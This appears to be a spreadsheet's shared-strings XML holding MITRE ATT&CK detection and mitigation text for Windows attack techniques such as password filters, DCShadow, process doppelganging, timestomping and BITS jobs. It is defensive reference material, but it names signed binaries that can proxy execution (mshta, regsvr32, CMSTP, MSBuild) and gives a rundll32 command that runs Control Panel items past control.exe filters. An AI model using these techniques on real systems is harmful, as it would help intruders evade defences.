    <t>Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.
Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor for change notifications to and from unfamiliar password filters.
Newly installed password filters will not take effect until after a system reboot.
Password filters will show up as an autorun and loaded DLL in lsass.exe.[[CiteRef::Clymb3r Function Hook Passwords Sept 2013]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1174</t>
  </si>
  <si>
    <t>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Packages&lt;/code&gt;.[[CiteRef:: Microsoft Install Password Filter n.d]]</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1145</t>
  </si>
  <si>
    <t>Use strong passphrases for private keys to make cracking difficult. When possible, store keys on separate cryptographic hardware instead of on the local system. Ensure only authorized keys are allowed access to critical resources and audit access lists regularly. Ensure permissions are properly set on folders containing sensitive private keys to prevent unintended access. Use separate infrastructure for managing critical systems to prevent overlap of credentials and permissions on systems that could be used as vectors for lateral movement. Follow other best practices for mitigating access through use of [[T1078|Valid Accounts]].</t>
  </si>
  <si>
    <t>Detecting use of proxied smart card connections by an adversary may be difficult because it requires the token to be inserted into a system; thus it is more likely to be in use by a legitimate user and blend in with other network behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1111</t>
  </si>
  <si>
    <t>Remove smart cards when not in use. Protect devices and services used to transmit and receive out-of-band codes.
Identify and block potentially malicious software that may be used to intercept 2FA credentials on a system by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Credential Access,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure.[[CiteRef::Microsoft Hook Overview]][[CiteRef::Volatility Detecting Hooks Sept 2012]] Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools [[CiteRef::Volatility Detecting Hooks Sept 2012]][[CiteRef::PreKageo Winhook Jul 2011]][[CiteRef::Jay GetHooks Sept 2011]] or by programmatically examining internal kernel structures.[[CiteRef::Zairon Hooking Dec 2006]][[CiteRef::EyeofRa Detecting Hooking June 2017]]
Rootkits detectors [[CiteRef::GMER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[[CiteRef::Microsoft Process Snapshot]] to compare the in-memory IAT to the real addresses of the referenced functions.[[CiteRef::StackExchange Hooks Jul 2012]][[CiteRef::Adlice Software IAT Hooks Oct 2014]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1179</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating all hooking will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1009</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1116</t>
  </si>
  <si>
    <t>Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system.[[CiteRef::NSA MS AppLocker]][[CiteRef::TechNet Trusted Publishers]][[CiteRef::Securelist Digital Certificates]]</t>
  </si>
  <si>
    <t>Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts.[[CiteRef::GitHub DCSYNCMonitor]][[CiteRef::DCShadow Blog]][[CiteRef::BlueHat DCShadow Jan 2018]] DC replication will naturally take place every 15 minutes but can be triggered by an attacker or by legitimate urgent changes (ex: passwords).[[CiteRef::BlueHat DCShadow Jan 2018]] Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929).[[CiteRef::DCShadow Blog]]
Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies.[[CiteRef::Microsoft DirSync]][[CiteRef::ADDSecurity DCShadow Feb 2018]]
Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects.[[CiteRef::BlueHat DCShadow Jan 2018]]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logging.[[CiteRef::ADDSecurity DCShadow Feb 2018]] A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1207</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of AD design features. For example, mitigating specific AD API calls will likely have unintended side effects, such as preventing DC replication from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.</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</si>
  <si>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
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1140</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities or potentially malicious software that may be used to deobfuscate or decode files or information, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log or event file reporting may be suspicious. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1089</t>
  </si>
  <si>
    <t>Ensure proper process, registry, and file permissions are in place to prevent adversaries from disabling or interfering with security services.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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1073</t>
  </si>
  <si>
    <t>Update software regularly. Install software in write-protected locations. Use the program sxstrace.exe that is included with Windows along with manual inspection to check manifest files for side-loading vulnerabilities in software.</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</si>
  <si>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[[T1055|Process Injection]] for attempts to hide execution or evidence of [[Discovery]]. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1211</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</si>
  <si>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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1107</t>
  </si>
  <si>
    <t>Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives.[[CiteRef::Github PowerSploit Ninjacopy]]
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [[T1086|PowerShell]], additional logging of PowerShell scripts is recommended. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1006</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may be used to access logical drives in this manner, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1054</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/wiki/T1066</t>
  </si>
  <si>
    <t>Mitigation is difficult in instances like this because the adversary may have access to the system through another channel and can learn what techniques or tools are blocked by resident defenses. Exercising best practices with configuration and security as well as ensuring that proper process is followed during investigation of potential compromise is essential to detecting a larger intrusion through discrete alerts.
Identify and block potentially malicious software that may be used by an adversary by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1070</t>
  </si>
  <si>
    <t>Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. Protect generated event files that are stored locally with proper permissions and authentication. Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.</t>
  </si>
  <si>
    <t>Monitor and analyze logs from host-based detection mechanisms, such as Sysmon, for events such as process creations that include or are resulting from parameters associated with invoking programs/commands and/or spawning child processes.[[CiteRef::RSA Forfiles Aug 2017]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1202</t>
  </si>
  <si>
    <t>Identify or block potentially malicious software that may contain abusive functionality by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]. These mechanisms can also be used to disable and/or limit user access to Windows utilities used to invoke execution.</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.[[CiteRef::SpectorOps Code Signing Dec 2017]] Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.[[CiteRef::SpectorOps Code Signing Dec 2017]] The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.[[CiteRef::Microsoft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comparison:[[CiteRef::Tripwire AppUNBlocker]]
*18F7C1FCC3090203FD5BAA2F861A754976C8DD25
*245C97DF7514E7CF2DF8BE72AE957B9E04741E85
*3B1EFD3A66EA28B16697394703A72CA340A05BD5
*7F88CD7223F3C813818C994614A89C99FA3B5247
*8F43288AD272F3103B6FB1428485EA3014C0BCFE
*A43489159A520F0D93D032CCAF37E7FE20A8B419
*BE36A4562FB2EE05DBB3D32323ADF445084ED656
*CDD4EEAE6000AC7F40C3802C171E30148030C072 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1130</t>
  </si>
  <si>
    <t>HTTP Public Key Pinning (HPKP) is one method to mitigate potential man-in-the-middle situations where and adversary uses a mis-issued or fraudulent certificate to intercept encrypted communications by enforcing use of an expected certificate.[[CiteRef::Wikipedia HPKP]]
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store.[[CiteRef::SpectorOps Code Signing Dec 2017]]</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</si>
  <si>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activity.[[CiteRef::Endgame Masquerade Ball]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1036</t>
  </si>
  <si>
    <t>When creating security rules, avoid exclusions based on file name or file path. Require signed binaries. Use file system access controls to protect folders such as C:\Windows\System32. Use tools that restrict program execution via whitelisting by attributes other than file name.
Identify potentially malicious software that may look like a legitimate program based on name and location, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1047|Windows Management Instrumentation]] and [[T1086|PowerShell]], which may require additional logging features to be configured in the operating system to collect necessary information for analysis. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1112</t>
  </si>
  <si>
    <t>Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [[T1058|Service Registry Permissions Weakness]]. Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.
Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</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</si>
  <si>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[[T1077|Windows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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1126</t>
  </si>
  <si>
    <t>Follow best practices for mitigation of activity related to establishing [[T1077|Windows Admin Shares]]. 
Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Forensic techniques exist to identify information stored in NTFS EA.[[CiteRef::Journey into IR ZeroAccess NTFS EA]] Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions, used to interact with EA, and consider regularly scanning for the presence of modified information.[[CiteRef::SpectorOps Host-Based Jul 2017]]
The Streams tool of Sysinternals can be used to uncover files with ADSs. The &lt;code&gt;dir /r&lt;/code&gt; command can also be used to display ADSs.[[CiteRef::Symantec ADS May 2009]] Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a &lt;code&gt;-stream&lt;/code&gt; parameter to interact with ADSs.[[CiteRef::MalwareBytes ADS July 2015]][[CiteRef::Microsoft ADS Mar 2014]]
Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: &lt;code&gt;file.ext:ads[.ext]&lt;/code&gt;) is commonly associated with ADSs.[[CiteRef::Microsoft ADS Mar 2014]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1096</t>
  </si>
  <si>
    <t>It may be difficult or inadvisable to block access to EA and ADSs.[[CiteRef::Microsoft ADS Mar 2014]][[CiteRef::Symantec ADS May 2009]] Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to hide information in EA and ADSs by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
Consider adjusting read and write permissions for NTFS EA, though this should be tested to ensure routine OS operations are not impeded.[[CiteRef::InsiderThreat NTFS EA Oct 2017]]</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</si>
  <si>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files/payloads.[[CiteRef::GitHub Revoke-Obfuscation]][[CiteRef::FireEye Revoke-Obfuscation July 2017]][[CiteRef::GitHub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
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1027</t>
  </si>
  <si>
    <t>Ensure logging and detection mechanisms analyze commands after being processed/interpreted, rather than the raw input. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10 for this functionality.[[CiteRef::Microsoft AMSI June 2015]]
Mitigation of compressed and encrypted files sent over the network and through email may not be advised since it may impact normal operations.</t>
  </si>
  <si>
    <t>Process Doppelg?nging</t>
  </si>
  <si>
    <t>Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelg?nging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]][[CiteRef::hasherezade Process Doppelg?nging Dec 2017]]
Scan file objects reported during the PsSetCreateProcessNotifyRoutine,[[CiteRef::Microsoft PsSetCreateProcessNotifyRoutine routine]] which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access.[[CiteRef::BlackHat Process Doppelg?nging Dec 2017]] Also consider comparing file objects loaded in memory to the corresponding file on disk.[[CiteRef::hasherezade Process Doppelg?nging Dec 2017]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1186</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.
Although Process Doppelg?nging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</si>
  <si>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technique.[[CiteRef::Engame Process Injection July 2017]]
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1093</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</si>
  <si>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process hollowing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</si>
  <si>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Some rootkit protections may be built into anti-virus or operating system software. There are dedicated rootkit detection tools that look for specific types of rootkit behavior. Monitor for the existence of unrecognized DLLs, devices, services, and changes to the MBR.[[CiteRef::Wikipedia Rootkit]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1014</t>
  </si>
  <si>
    <t>Identify potentially malicious software that may contain rootkit functionality, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1045</t>
  </si>
  <si>
    <t>Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.
Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Forensic techniques exist to detect aspects of files that have had their timestamps modified.[[CiteRef::WindowsIR Anti-Forensic Techniques]] It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1099</t>
  </si>
  <si>
    <t>Mitigation of timestomping specifically is likely difficult. Efforts should be focused on preventing potentially malicious software from running. Identify and block potentially malicious software that may contain functionality to perform timestomping by using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Defense Evasion,Execution</t>
  </si>
  <si>
    <t>Use 4688 to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1191</t>
  </si>
  <si>
    <t>CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation). Consider using application whitelisting configured to block execution of CMSTP.exe if it is not required for a given system or network to prevent potential misuse by adversaries.[[CiteRef::MSitPros CMSTP Aug 2017]]</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the Windows Control Panel process binary (control.exe) and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [[T1085|Rundll32]] is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [[T1085|Rundll32]] command, which may bypass detections and/or execution filters for control.exe.[[CiteRef::TrendMicro CPL Malware Jan 2014]]
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems: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Panel.[[CiteRef::Microsoft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{Canonical_Name}&lt;/code&gt;).[[CiteRef::Microsoft Implementing CPL]]
*Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.[[CiteRef::Microsoft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techniques.[[CiteRef::TrendMicro CPL Malware Jan 2014]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1196</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific Windows API calls and/or execution of particular file extensions will likely have unintended side effects, such as preventing legitimate software (i.e., drivers and configuration tools) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.
Restrict storage and execution of Control Panel items to protected directories, such as C:\Windows, rather than user directories.
Index known safe Control Panel items and block potentially malicious software using whitelisting[[CiteRef::Beechey 2010]] tools like AppLocker[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] that are capable of auditing and/or blocking unknown executable files.
Consider fully enabling User Account Control (UAC) to impede system-wide changes from illegitimate administrators.[[CiteRef::Microsoft UAC]]</t>
  </si>
  <si>
    <t>Use 4688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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1118</t>
  </si>
  <si>
    <t>InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use 4688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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1170</t>
  </si>
  <si>
    <t>Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer which have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Use 4688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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1121</t>
  </si>
  <si>
    <t>Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.</t>
  </si>
  <si>
    <t>Use 4688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loaded.[[CiteRef::Carbon Black Squiblydoo Apr 2016]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1117</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</t>
  </si>
  <si>
    <t>Use 4688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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1085</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</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</si>
  <si>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word.exe, spawning instances of cmd.exe, script application like wscript.exe or powershell.exe, or other suspicious processes may indicate malicious activity.[[CiteRef::Uperesia Malicious Office Documents]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1064</t>
  </si>
  <si>
    <t>Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.
Configure Office security settings enable Protected View, to execute within a sandbox environment, and to block macros through Group Policy.[[CiteRef::Microsoft Block Office Macros]] Other types of virtualization and application microsegmentation may also mitigate the impact of compromise. The risks of additional exploits and weaknesses in implementation may still exist.[[CiteRef::Ars Technica Pwn2Own 2017 VM Escape]]</t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1218</t>
  </si>
  <si>
    <t>Certain signed binaries that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1216</t>
  </si>
  <si>
    <t>Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use 4688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 ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1127</t>
  </si>
  <si>
    <t>MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe may not be necessary within a given environment and should be removed if not used.
Use application whitelisting configured to block execution of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe if they are not required for a given system or network to prevent potential misuse by adversaries.[[CiteRef::Microsoft GitHub Device Guard CI Policies]][[CiteRef::Exploit Monday Mitigate Device Guard Bypases]][[CiteRef::GitHub mattifestation DeviceGuardBypass]][[CiteRef::SubTee MSBuild]]</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence</t>
  </si>
  <si>
    <t>BITS runs as a service and its status can be checked with the Sc query utility (&lt;code&gt;sc query bits&lt;/code&gt;).[[CiteRef::Microsoft Issues with BITS July 2011]] Active BITS tasks can be enumerated using the [[Software/S0190|BITSAdmin]] tool (&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;).[[CiteRef::Microsoft BITS]]
Monitor usage of the [[Software/S0190|BITSAdmin]] tool (especially the ?Transfer?, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) [[CiteRef::Microsoft BITSAdmin]] and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database.[[CiteRef::CTU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account).[[CiteRef::Microsoft BITS]] ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1197</t>
  </si>
  <si>
    <t>This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, disabling all BITS functionality will likely have unintended side effects, such as preventing legitimate software patching and updating. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identification of subsequent malicious behavior.[[CiteRef::Mondok Windows PiggyBack BITS May 2007]]
Modify network and/or host firewall rules, as well as other network controls, to only allow legitimate BITS traffic.
Consider limiting access to the BITS interface to specific users or groups.[[CiteRef::Symantec BITS May 2007]]
Consider reducing the default BITS job lifetime in Group Policy or by editing the &lt;code&gt;JobInactivityTimeout&lt;/code&gt; and &lt;code&gt;MaxDownloadTime&lt;/code&gt; Registry values in &lt;code&gt; HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS&lt;/code&gt;.[[CiteRef::Microsoft BITS]]</t>
  </si>
  <si>
    <t>,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1109</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</si>
  <si>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&lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\&lt;/code&gt;.[[CiteRef::Endgame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</si>
  <si>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https://attack.mitre.org/wiki/T1122</t>
  </si>
  <si>
    <t>Direct mitigation of this technique may not be recommended for a particular environment since COM objects are a legitimate part of the operating system and installed software. Blocking COM object changes may have unforeseen side effects to legitimate functionality.
Instead, identify and block potentially malicious software that may execute, or be executed by, this technique using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Monitor the file system and shell commands for files being created with a leading "." and the Windows command-line use of attrib.exe to add the hidden attribute. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1158</t>
  </si>
  <si>
    <t>Mitigation of this technique may be difficult and unadvised due to the the legitimate use of hidden files and directories.</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</si>
  <si>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[[T1078|Valid Accounts]] and [[T1133|External Remote Services]] to collect account use information. ,</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/T1108</t>
  </si>
  <si>
    <t>Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]
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as to avoid detection by common defensive tools.[[CiteRef::University of Birmingham C2]]</t>
  </si>
  <si>
